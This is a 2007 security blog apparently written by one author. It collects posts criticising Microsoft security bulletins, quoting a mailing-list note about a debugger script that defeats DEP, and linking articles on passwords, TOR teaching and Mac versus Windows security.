Bill’s Security Blog

Here’s a perfect example of how Microsoft’s commitment to security is more investor relations than a real dedication to secure computing.

Let’s take a quick look at some slugs from MS06-016, update January 10, 2007:

Microsoft Security Bulletin MS06-016
Cumulative Security Update for Outlook Express (911567)
Impact of Vulnerability: Remote Code Execution
Affected Software:

• Microsoft Windows 2000 Service Pack 4
• Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2
• Microsoft Windows XP Professional x64 Edition
• Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
• Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
• Microsoft Windows Server 2003 x64 Edition
• Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (Windows Me) – Review the FAQ section of this bulletin for details about these operating systems.

An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

This is just about the point where you find me curled up into a ball, head in my hands, rocking back and forth, muttering “WTF, OMG, WTF, Oh Noz!”I mean, for REAL.

Lets take a look.

Could anyone who is not institutionalized tell me why on EARTH Outlook Express is installed on a server!

Outlook Express (like most useless Windows add-on’s) is installed by default, and if you remove it, Windows is happy to re-install it the next time you run Windows Update

We are looking at Windows Server 2000 to 2006 being affected by this bulletin. Doesn’t it seem reasonable that you log into that server as Administrator? I mean, there is no other reason to log into a server unless to perform administrative tasks, and I know of not one Windows SA that logs in locally and runs his apps using run-as.

So, if you are like every SA I know, and if you happen to be really stupid and use Outlook Express to read email, then you might as well just post your password to the Full Disclosure list and call it a day.

Here’s a quick scenario. Typical lazy, uninformed, and completely security un-aware Windows admin logs into his Windows box to try to figure out why his server is sending thousands of spam messages. He looks at the mail pick-up queue and double clicks an email to see what it says. PWNT! As Microsoft dutifully pops open OE to view the message.

Sometimes I get sick of reading these messages, and wonder why I still work in a Windows environment. On the other hand, it Microsoft = job security, so I shoul be grateful.

Please note, I’m not arbitrarily picking on Microsoft today. But I have just added the 3 Microsoft security RSS feeds to my reader, and am sifting through the articles… Almost everyone writes bad code… Just ask the PHP people… Lolz.

Bill Gross

It was only a matter of time.

“Vulnerability in the way HTML Objects Handle Unexpected Method Calls Could Allow Remote Code Execution”

The “Microsoft Malware Protection Engine” is the core of just about all of the Microsoft security tool suite.

Details:

A remote code execution vulnerability exists in the Microsoft Malware Protection Engine because of the way that it parses Portable Document Format (PDF) files. An attacker could exploit the vulnerability by constructing a specially crafted PDF File that could potentially allow remote code execution when the target computer system receives, and the Microsoft Malware Protection Engine scans, the PDF file.

Solution:

… administrators can disable the Microsoft Malware Protection Engine as a workaround …

Microsoft hasn’t been able to write secure code in 25 years. What makes us think they’ll begin doing so now.

PWNT by your malware detection system.

Good job, Microsoft.

For the end user:
Switch to an OS with a proven track record for security. Linux if you are impatient, OpenBSD if you like 100 proof.

For Microsoft:
How about a simple code analyzer. This bug is because your N00bish tool trusts un-verified input provided by an untrusted third party.

Full Details:
http://www.microsoft.com/technet/security/bulletin/ms07-010.mspx?pubDate=2007-02-13

Hardware DEP (or, Data Execution Prevention) is a method for preventing buffer overflows by marking certain pages in memory as “code” or “non-code”.  The idea being that if a buffer overflow writes code into a page marked non-executable, then the overflow would not be successful in running the malicious code.

DEP promises to be the end of the buffer overflow attack.

Or is it…

Dave Aitel of Immunity has some interesting things to say about using his debugger to create code that circumvents hardware DEP.

Here’s a snip:

Yesterday, before most of Immunity went bowling (like all hackers, we’re
extremely athletic), Nico was showing me the “defeat dep” Immunity Debugger
script. You type “!defeatdep” and then it has a little wizard you go through
and then you’ve got a buffer that will do the return into libc trick to
defeat DEP. Simple and easy! It’s part of an “Advanced Windows Overflows”
class we’re teaching all next week. Nico’s Immunity Debugger !heap script
allows you to do do all sorts of tricks with heaps - and to defeat the next
generation of heap protection, you’re going to need all of it, plus some
luck. Kostya’s “!safeseh” script does various neat things around that as
well. None of the free debuggers allow you to do this stuff, but none of the
free debuggers are specifically for exploit development either.

Read the full thread for more lively discussion:
http://lists.immunitysec.com/pipermail/dailydave/2007-February/004094.html

Bill Gross

Schneier wrote a great article on password security, the impact of complexity, and the ease of cracking passwords.

Finally, great advice on how to choose good passwords.

Some of us, after all, do not have two-factor authentication.

http://www.schneier.com/blog/archives/2007/01/choosing_secure.html

Enjoy,
Bill Gross

Oh Noz.

I been saying for a long time that:

1. Microsoft can’t code their way out of a paper bag (as far as security goes)
2. Letting them write their own security suite is like letting the fox build the hen-house…

And my prophecy came true, sadly…

Take a moment to enable that hardware DEP!

From the Inquirer:
http://www.theinquirer.net/default.aspx?article=37629

By Andrew Thomas
14 February 2007

OH DEAR, OH DEAR. If there was one piece of software you’d expect to be secure from malware attacks it would have to be malware protection software itself. Sadly, this is not the case with Microsoft Defender, the software giant’s all-singing, all-dancing user security package.

According to security bulletin CVE-2006-5270 - Microsoft Malware Protection Engine Vulnerability, Integer overflow in the Microsoft Malware Protection Engine (mpengine.dll), as used by Windows Live OneCare, Antigen, Defender, and Forefront Security, allows user-assisted remote attackers to execute arbitrary code via a PDF file. All the following are at risk of remote code execution:

Windows Live OneCare
Microsoft Antigen for Exchange 9.x
Microsoft Antigen for SMTP Gateway 9.x
Microsoft Windows Defender
Microsoft Windows Defender x64 Edition
Microsoft Windows Defender in Windows Vista
Microsoft Forefront Security for Exchange Server
Microsoft Forefront Security for SharePoint

According to the bulletin rated ‘critical’ a remote code execution vulnerability exists in the Microsoft Malware Protection Engine because of the way that it parses Portable Document Format (PDF) files. An attacker could exploit the vulnerability by constructing a specially crafted PDF File that could potentially allow remote code execution when the target computer system receives, and the Microsoft Malware Protection Engine scans, the PDF file.

To have one insecure security product could be seen as unlucky; to have eight looks a bit like carelessness.

L’INQ
Microsoft Security Bulletin MS07-010
http://www.microsoft.com/technet/security/Bulletin/ms07-010.mspx

Some people only focus on the second part.

If it can be used for bad, it must be bad.

We see it all the time.  Misused hand guns result in death, so hand guns are bad.

It gets really ugly when people associate the “unknown” with bad.

I suspect a little of that is going on at Bowling Green State University where they are cracking down on the use of TOR on campus.

Here’s a great article from a professor down there.  He espouses many of the good uses and bad uses of TOR, and he did something I find really schweet.  He decided to go ahead with his lectures on TOR.

Good job, Paul Cesarini

Here’s the article:
http://seclists.org/isn/2007/Feb/0053.html

Enjoy,
Bill Gross

A few weeks ago I bought an iPod and have been using to listen to a series of security related podcasts.

And, of course, some non security related information as well…

But anyway, on the Metro this morning, it locked up.  Screen frozen, and completely unresponsive to my vast knowledge of information systems… LoL.

Here’s how to fix that issue, courtesy of Rachael Smithey and About.com:
http://macs.about.com/od/ipod/a/ipod_frozen.htm

Enjoy,
Bill Gross
 

On February 6, 2007, eSecurity Planet ran an article on their site titled “Is the Mac Really More Secure than Windows?”

Right off the bat, I want to beg the reader’s forgiveness for the harsh tone of this post.

Here’s the deal.  I really, really hate articles like this for several reasons:

1. The question, in it’s very essence, is meaningless.  How on earth can any reasonable person hope to answer that question.  Asking “is Mac more secure than Windows” is about as meaningful a question as, “is my watch  easier to read than yours?”
2. Because of the senselessness of such questions, it makes me sad to see someone who is a “20-year veteran of IT security” actually trying to address it.
3. Putting 2 and 3 together, the article, in my mind, discredits Ken van Wyk (the author), eSecurity Planet, and gives security professionals a bad name in general.

Now, I’m not saying Ken van Wyk is not a bright guy, but reading the article, I sense that he is dancing around the elephant in the room.  IE, there is no reasonable way to answer the question he’s writing about.

He starts by trying to clarify his assertion that he is more secure on Mac because of his familiarity with the platform.  This clarification leads to the conclusion that what he’s about to say may not apply to someone (or anyone for that matter) else.  Reasonable, valid, and I’ll touch on this more in a minute.

But then he goes on to, IMHO, arbitrarily select a few feature differences between the platforms and then, gasp, assigns what appear to be completely arbitrary scores to each platform based on those differences with respect to which implements a feature in a more secure manner.

I don’t want to get into this article too much, because most of it is absurd on it’s face, but I want to draw the reader’s attention to one point Ken did make, and to which I agree.

Let’s take a quick look at what I believe is the only substantive statement that Ken makes:

“For starters, please note that I didn’t say that OS X (Tiger) is more secure than Windows (XP, Vista, or otherwise). No, that’s not at all what I said. I said I’m more secure on a Mac, and I truly believe it.”

The last part of that paragraph touches on why the entire debate is completely absurd…

“… I’m more secure on a Mac, and I truly believe it.”

Define security.

Do that and you see the complexity of answering this question.

As an employee of my particular organization, I say I’m infinitely more secure on a Windows box than a Mac box.  “Why,” you ask?  Because my Windows box implements and complies with my corporate information security policy, and a Mac box does not.

You must define what security is in order to evaluate which platform is more secure.

So, I’ll give Ken credit for clarifying that he is more secure on Mac than Windows, but reader be warned.  You must develop your own “security policy” before you can begin to explore which platform you are going to stand behind.

And once you choose, don’t  try to assert that that your conclusion is what I need, because there is good reason to believe that it isn’t.

I call on all security professionals to bust out the “please define security before I answer that question” clause.  Doing so not only increases credibility, but also helps alert the noob asking the question to the fact that, well, to the fact that he’s a noob for asking.

Bill Gross